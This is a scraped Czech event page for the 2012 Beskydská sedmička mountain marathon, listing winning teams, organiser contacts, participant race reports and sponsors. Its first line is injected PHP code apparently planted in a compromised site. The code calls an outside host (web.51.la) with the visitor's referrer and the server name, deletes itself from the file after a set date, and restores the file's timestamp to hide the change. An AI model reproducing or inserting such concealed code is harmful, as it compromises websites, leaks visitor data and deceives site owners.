check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012 - VAŠE REPORTÁŽE
           
www.continental.cz
M ČR V HORSKÉM MARATONU DVOJIC
EXTRÉMNÍ PŘECHOD BESKYD - JAVOROVÝ - JAVORNÍK 2012
HLAVNÍ STRÁNKAVÝSLEDKOVÁ LISTINAINFO ZE ZÁVODUMÉDIA / PRESSFOTOGALERIE

VÍTĚZNÉ TÝMY MČR

1.MÍSTO
194 - SALOMON-RUN
PETREČEK TOMÁŠ
ŠTRYNCL PAVEL

ČAS VÍTĚZE: 13:05:04

2.MÍSTO
117 - SLS3-SKVK
CYPRA ZBYNĚK
VABROUŠEK PETR
ČAS: 13:13:31

3.MÍSTO
253 - L4L5S1
POLÁK VLADIMÍR
NAHORNIAK TOMÁŠ
ČAS: 13:51:24 

UPOUTÁVKY 2012

BESKYDSKÁ SEDMIČKA - 2012


REGISTRACE B7 - 2012


INLINE 24 - 2012


LH 24 - 2012

KONTAKT NA ORGANIZAČNÍ TEAM:
Pořadatel akce SK K2 o.s., Libor Uher
Česká asociace extrémních
sportů - ČAES

Vedení závodu
Libor Uher
+420 608 228 227
libor@beskydskasedmicka.cz

Jana Matějíková
presscentrum
+420 602 936 634
info@beskydskasedmicka.cz


MUDr. Radomír Maráček
organizační tým B7, doprava, lékař
rm@beskydskasedmicka.cz


Registrace závodu

Kateřina Uhrová
+420 603 228 228
registrace@beskydska
sedmicka.cz


Marian Žárský
kulturní program Frenštát
marian@beskydskasedmicka.cz


Martina Filipová

organizační tým B7
martina@beskydskasedmicka.cz


Tomáš Janeček

grafika, web, technik
+420 777 712 747
tomas@beskydskasedmicka.cz


Iveta Nakoukalová

dobrovolníci, akreditace
iveta@beskydskasedmicka.cz


Mirek Prašivka

všechno ostatní :-)

Tomáš Zatloukal
doprava pořadatelů

Petr Kalina
značení a úklid trati

Dušan Klimek
technické zajištění FrenštátADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012 - VAŠE REPORTÁŽE
EXTREMNIZAVODY.CZ - Beskydská sedmička 2012 - výsledky

3. ročník horského maratonu dvojic Beskydská sedmička 2012, který se uskutečnil o víkendu 7.-.9 září, nabídl třem tisícovkám účastníků možnost poměřit své síly jak se soupeři, tak především se sebou samotnými. Trasa dlouhá 95 kilometrů s převýšením 5430 metrů vedla ze slezského Třince přes celé Beskydy až do Frenštátu pod Radhoštěm. Oproti předchozím létům se tak směr závodu otočil a populární B7 dostala opět jiný rozměr. Prudké seběhy se změnily v prudká stoupání a táhlejší výstupy v delší seběh. Po startu navíc přibyla dlouhá rovinka pod první kopec.

Celý článek...
 
BEZVABEH.CZ - Kdo jsou favorité Beskydské sedmičky? Přijede i Petr Vabroušek
V pátek ve 22.00h odstartuje z náměstí Svobody v Třinci MČR v horském maratonu dvojic ADIDAS TERREX – CONTINENTAL BESKYDSKÁ SEDMIČKA 2012. K dnešnímu dni je podle startovní listiny ve výkonostní kategorii SPORT (MČR) přihlášeno celkem 420 dvojic tj. 840 jednotlivců. Do kategorie HOBBY se zapsalo 1057 týmůs 2114 jednotlivci.
Celý článek...
 
EXTREMNIZAVODY.CZ - Před startem Beskydské sedmičky 2012

Před pár lety bláznivý nápad, nyní nejmasovější extrém v republice. Beskydská sedmička se během dvou let zařadila mezi top akce svého druhu ve střední Evropě a láká stále více lidí k tomu, aby si vyzkoušeli své fyzické možnosti v krásném prostředí Beskyd.

Celý článek...
 
Beskydská 7 - extrémní pouť

Dva týmy Charity Ostrava se zúčastnily třetího ročníku BESKYDSKÉ SEDMIČKY - extrémního přechodu Beskyd, který odstartoval z Třince 7. 9. ve 22:00 h a vedl ve dvou kategoriích přes sedm vrcholů s celkovým převýšením pět tisíc metrů na 92 km.

Celý článek...
 
Miroslav Bittner - Honzíková cesta Javorový-Javorník
B-7, jak ji nazval organizátor je to takový čundr přes Beskydy. Ono čundr 92km přes 7 vrcholů na jeden zátah - pěkná výzva.
Po tom co jsem z Ivčou úspěšně absolvovali LH24 jsem nadhodil jestli to nechce zkusit se mnou na B7, ani nijak neprotestovala, stejně prý tušila že bych ji přemlouval. Kdo jiný by šel, než ten - tá co vydrží závod co závod jet na kole 10h.
Já trénoval běh, Ivča kolo a hurá do bezvědomí.
Celý článek...
 
Iva Mědílková - Čundr po Beskydech
Po absolvování LH24 jsme se s Mírou rozhodli okusit další z Uherových extrémů a to Beskydskou 7. Jedná se o závod týmů přes 7 beskydských vrcholů (délka trasy hobby 92 km nastoupání 4821 m). Moje předsevzetí 3/4 roku cíleně na tento závod trénovat vzalo s cyklistickou sezonou za své. Čím víc se blížilo datum, tím víc se mi dělalo úzko, jak budu po takovém závodě bez přípravy zbitá a zda klouby takovou zátěž vydrží. Že jsem vytrvalec a mám pevnou vůli, to bylo asi jediné, čemu jsem věřila.
Celý článek...
 
Ing. Lubomír Nový - Beskydská sedmička 2012 - napotřetí
Když jsem před 2,5 lety objevil v týdenníku Sedmička (tehdy volně rozebíratelnému na naší poliklinice), že je vymyšlen pochod přes sedm beskydských vrchů za 40 hodin, pocítil jsem, že je to výzva, že je to při troše fyzičky zvládnutelný a po poradě s Petrem Kašparem, kolegou, který tentýž závod objevil Sedmičce kolínské, jsme se přihlásili.
Celý článek...
 
Věra Hoštičková - Kde je vůle, tam je i cesta. Beskydská sedmička

Bolely vás někdy nohy? Mysleli jste si, že skutečně hodně? Ujistím vás, že to ,,bolení“ jde dovést až do extrému. Stačí si sehnat dva sportošílený parťáky, udělat klik, klik a vyrazit na Beskydskou sedmičku. Bolenoh je zde umocněný tak na desátou.

Celý článek...
 
Břízův report z účasti na extrémním horském maratonu dvojic

První zmínku s bratrancových úst o 3. Ročníku Beskydské sedmičky jsem loňskou zimu okomentoval slovy: „ …. se ti na to můžu vysrat, běžet někde po horách 85 kiláků…..“. Po shlédnutí dokumentu o „Sedmičce“ jsem začal žhavit telefon a shánět někoho do dvojky. Dokument mě úplně dostal. Tohle chcu dát! Z pěti možných souputníků zbyl nakonec přece jen bratranec Roman. Vymysleli jsme název týmu (Bříza Running man), kterej se stejně dobře mohl jmenovat Takychardik Psoriatik Plícař. Roman má problém se srdečním svalem a já měl lupenku v „rozvojové“ fázi, plus nejistou pravou plíci, s kterou jsem před třema rokama prodělal spontánní pneumotorax. Super zdravá dvojka mohla vyrazit vstříc dobrodružství!

Celý článek...
 
Po fraktuře páteře zvládla maraton. A teď i Beskydskou sedmičku

Pokud člověk něco opravdu chce, nic ho nezastaví. Lékařka Blanka Zbořilová (52) je toho živoucím důkazem. Po úrazu páteře jí hrozilo ochrnutí, ona se však pustila do náročné rehabilitace. Začala běhat a dostala se do takové kondice, že v květnu absolvovala svůj první maraton. Další metu si postavila hodně vysoko – extrémní horský závod dvojic Beskydská sedmička na 83 kilometrů. Jak se s ní popasovala?

Celý článek...
 
Beskydská sedmička 2012 - Hrkol č. 46

Když jsme v pátek 7. 9. 2012 po roce přijížděli do Frenštátu p. R. a vítaly nás jako všechny účastníky Beskydské sedmičky legendární vrcholy jako Radhošť a Javorník, necítila jsem se zrovna moc dobře. Jak by ne, vidina šlapání 95 km s převýšením 5600 m v kategorii sport mix nad padesát let nevypadala vůbec lákavě.

Celý článek...
 
Olda Kokošek - B7 2012

Rok se s rokem sešel a to znamenalo další účast na B7 – extrémním horském maratonu v Beskydech. Libor Uher připravil delší trasu (94 km), zároveň ji otočil, takže trasa se změnila razantně (k lepšímu). Parťák byl po minulém roce jasný – Kuba Franer. Ono najít někoho, kdo by do toho šel s nějakými ambicemi a výkonností je problém a po minulém roce jsme se domluvili, že se vrátíme a vylepšíme čas.

Celý článek...
 
Romana Červinková - B7 2012: Trpělivost verus ego

Svítání i západ slunce nad Beskydami. Nevšední zážitky, pocit vítězství nad sebou samým, dobrodružství, euforie, únava, bolest, emoce, přátelství… Zkus to zažít. Potřebuješ k tomu odhodlání, sílu, morál a vůli absolvovat náročné stoupání severními svahy na víc jak devadesáti kilometrech…

Celý článek...
 
9th Moon - Renda - Beskydská sedmička 2012
Beskydská sedmička nebo taky familiárně B7. Dvě slova co se tak mazlivě převalují na jazyku. Jenže kdo jednou podlehne mámení, tak pozná, že tahle medicínka je teda pořádně hustej nářez a pro náhodné kolemjdoucí, kteří by snad dostali chuť si s ní zalaškovat, má připravenou širokou škálu hořkosti, kterou je nechá s potěšením vypít až do dna. Když jsem loni v televizi viděl krátkou reportážz téhle výzvy, která nesnese porovnání hned tak s něčím, bylo mi jasný, že dřív nebo později si tuhle radost rozhodně dopřeju. A ten den nastal zrovna 7.září. No a protože naše taktika zní, že štěstí přeje připraveným, tak od jara jsem přípravu směřoval k jedinému cíli. Přežít to ve zdraví a dojít si z Třince přes Beskydy do Frenštátu pro skalp téhle perly. A jaká letos byla B7 z pohledu težkejch amatérů? Tvrdá, neúprosná, spravedlivá, no však uvidíte.
Celý článek...
 


GENERÁLNÍ PARTNEŘI

adidas


1511


PARTNEŘI

IBS    
Frenštát pod Radhoštěm


www.rajpneu.czAuthor
I style

 

black


Nutrend

radegast


 
  

black


 


 

Suunto


 

 Frýdek-Místek     Obec Ostravice

 

       

  

Opavanet

 

Sportovní medicína

 
 

Mapy Shokart

 

Author
In agency    Škola - Frenštát pod Radhoštěm SK Valašské království


KLUB ČESKÝCH TURISTŮ


 

CAES


CAES

CAES